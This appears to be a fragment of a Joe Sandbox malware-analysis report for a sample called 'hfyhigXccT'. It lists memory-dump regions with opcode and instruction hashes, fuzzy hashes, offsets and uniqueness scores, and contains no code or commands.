                                      • Opcode ID: e288a8769c3690f50047eacf8fade2083d73387ba0836dbe1856adacd877dc9b
                                      • Instruction ID: fd19546d2b775af03af227f42d64d61beab014c710682ea1445122b2f44b813f
                                      • Opcode Fuzzy Hash: e288a8769c3690f50047eacf8fade2083d73387ba0836dbe1856adacd877dc9b
                                      • Instruction Fuzzy Hash: 1D12D5F1C9174A8AD710CF65E99C289BBA0F7453A8BD04B08D2B17BAD1D7B6016ECF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.282155545.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5a60000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88ee5f2c64be2b2049dec508f5af795bfa097c8314c99d50bef542328ec899a8
                                      • Instruction ID: dc103101855752d7659399b431401e6a0424cca104eff2447e266be14c00f0a1
                                      • Opcode Fuzzy Hash: 88ee5f2c64be2b2049dec508f5af795bfa097c8314c99d50bef542328ec899a8
                                      • Instruction Fuzzy Hash: B0C14971E00259DFDF25CFA5C980B9ABBB2FF88310F14C1AAD419AB255DB709985CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.282155545.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5a60000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18c79fe611de5a27fbda4ecc17ec4eb9e42dc6f2f0d3df7415a38ff0ea77f08a
                                      • Instruction ID: d0b82ff4a37bf6d82ff4381b27b1abbc87185b14b3b6339f1465cc774c7b417c
                                      • Opcode Fuzzy Hash: 18c79fe611de5a27fbda4ecc17ec4eb9e42dc6f2f0d3df7415a38ff0ea77f08a
                                      • Instruction Fuzzy Hash: F6C14871E002599FCF25CFA5C984B9EBBB2FF88310F14C1AAD419AB255DB709984CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9360ecf23f15b0f8eb78df0c5398583fca78e6e3a4ee525d2c2a87a3cca1b49
                                      • Instruction ID: fa5b5badf59521cba8bbbf71085a74f11cba57873f269f0c57f6ea2b92b2fbe6
                                      • Opcode Fuzzy Hash: c9360ecf23f15b0f8eb78df0c5398583fca78e6e3a4ee525d2c2a87a3cca1b49
                                      • Instruction Fuzzy Hash: 92A17E32E0021A8FCF05EFA9C8449EDBBF2FF85301B15856AE905BF261DB71A955CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88275b8ca8662109a59ad19dfc7974e2c56bdff5f79505891982414f93b0c6db
                                      • Instruction ID: bd368651a542f2d124ba2e2c79144fb26659e6c222e46a333be2c1e37c6a043b
                                      • Opcode Fuzzy Hash: 88275b8ca8662109a59ad19dfc7974e2c56bdff5f79505891982414f93b0c6db
                                      • Instruction Fuzzy Hash: 1CC127F1C9174A8AD710DF64E99C189BB71FB853A8B904B08D1B17B6D0D7B510AECF84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.278843343.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                      • Associated: 00000000.00000002.278831293.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.278954169.0000000000BFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b80000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ce78df237b3a8992cdbcbd0fa366bb7fd97de0b5cbbffafc5ff72cc84acf6f12
                                      • Instruction ID: 4bbff52bd227b02f45c879415873394b2aade4993eea3228f192b88b08748c6c
                                      • Opcode Fuzzy Hash: ce78df237b3a8992cdbcbd0fa366bb7fd97de0b5cbbffafc5ff72cc84acf6f12
                                      • Instruction Fuzzy Hash: 6A01DA7B25106E3D23161D2B9C0ADE7771FF3D7626319436EA464C7541CE31982A46E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.278843343.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                      • Associated: 00000000.00000002.278831293.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.278954169.0000000000BFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b80000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5cbff11a313984514ca3e74b79423793c6d3c4b1c58cfafff5bda6aa9b8589c0
                                      • Instruction ID: 1b3fcc1a5b263608617a119ea21e60ce28c884a658aff6e20868ccabc1cbbb25
                                      • Opcode Fuzzy Hash: 5cbff11a313984514ca3e74b79423793c6d3c4b1c58cfafff5bda6aa9b8589c0
                                      • Instruction Fuzzy Hash: 86F0F97B3950366D730609ABEC06CDF930BB2C89B73064536AA69CB681DF6098170AE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.278843343.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                      • Associated: 00000000.00000002.278831293.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.278954169.0000000000BFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b80000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b17b3da307a719ae41495fe04d3e234adab7892b4f984f966fd2978b8f6b1653
                                      • Instruction ID: a7f7dbd8b7edcbd4e705570e5e955ee112d1dca211c55c482b2d95f071fd7bf5
                                      • Opcode Fuzzy Hash: b17b3da307a719ae41495fe04d3e234adab7892b4f984f966fd2978b8f6b1653
                                      • Instruction Fuzzy Hash: 69F0B07B39203E2D73062D1A5D06EF7A30FB3CA21A305527EA569C7642DF61591B05E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.278843343.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                      • Associated: 00000000.00000002.278831293.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.278954169.0000000000BFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b80000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 286e34843c94ac1d62b3d97014096ed1116d8e4c7c11cc4cfb05e8402a665e94
                                      • Instruction ID: 6268db391067783ef70abe830019295b860772985ecabd9c3eecc5f33ccbacae
                                      • Opcode Fuzzy Hash: 286e34843c94ac1d62b3d97014096ed1116d8e4c7c11cc4cfb05e8402a665e94
                                      • Instruction Fuzzy Hash: 01F0A2B3808545F5271319779C08CB73D2B56E9BB117B936A7838EB8506EBA8813F560
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.278843343.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                      • Associated: 00000000.00000002.278831293.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.278954169.0000000000BFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b80000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f8f5fcfc862a104ba4029f2bc8638bf6334d1baa3923bdafcfbdc46a35f17e39
                                      • Instruction ID: e14309a562df4cc2ab5a457b007e2846d958c2aadb2eaad1b5f4e66c9fa7f1ca
                                      • Opcode Fuzzy Hash: f8f5fcfc862a104ba4029f2bc8638bf6334d1baa3923bdafcfbdc46a35f17e39
                                      • Instruction Fuzzy Hash: 0101F7B3544096F8272308679C08C573D2BA2ED7B033B437A78399B591EEB98813E1A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.278843343.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                      • Associated: 00000000.00000002.278831293.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.278954169.0000000000BFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b80000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc1474f2b50bc3f320c71d3f2eab81c655f5026dea309a5f3a2ec255acf37b97
                                      • Instruction ID: d39b1f93d7ce98fcb7f6690928015cc3b2b5a90080cd893ffbd48f2f34c28e4e
                                      • Opcode Fuzzy Hash: bc1474f2b50bc3f320c71d3f2eab81c655f5026dea309a5f3a2ec255acf37b97
                                      • Instruction Fuzzy Hash: 2CF0FFA9348191FE4723447BEC2CEC73C1795D97B033D02397C5197443FA9A8E15C950
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.278843343.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                      • Associated: 00000000.00000002.278831293.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.278954169.0000000000BFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b80000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 28bc95c38097d73ddbc0da32f30e895189af898fdc165d265fd7d3702bdecd92
                                      • Instruction ID: 2ce3348e2222c9aa7edd32bec7737f31235e9faec7fb72b79c420e80c17b16c5
                                      • Opcode Fuzzy Hash: 28bc95c38097d73ddbc0da32f30e895189af898fdc165d265fd7d3702bdecd92
                                      • Instruction Fuzzy Hash: B4F0963E398166DE87529C7FFC2CA8F6616E5D197271C4637BE10C7083EA228917C9B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.278843343.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                      • Associated: 00000000.00000002.278831293.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.278954169.0000000000BFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b80000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3f76355e381a2ea839e7b8fb505e99b4bedc0f948530b5095bcafabcf88b7286
                                      • Instruction ID: 5bbd92c4a8edf605c23132cad397edb18d65fc5c36e9a51a4babb3e3e057f2a3
                                      • Opcode Fuzzy Hash: 3f76355e381a2ea839e7b8fb505e99b4bedc0f948530b5095bcafabcf88b7286
                                      • Instruction Fuzzy Hash: 31F05A3B80C300C5230202FB1A0A562825616E36B1037C3202C3EFA8969CAB4803B480
                                      Uniqueness

                                      Uniqueness Score: -1.00%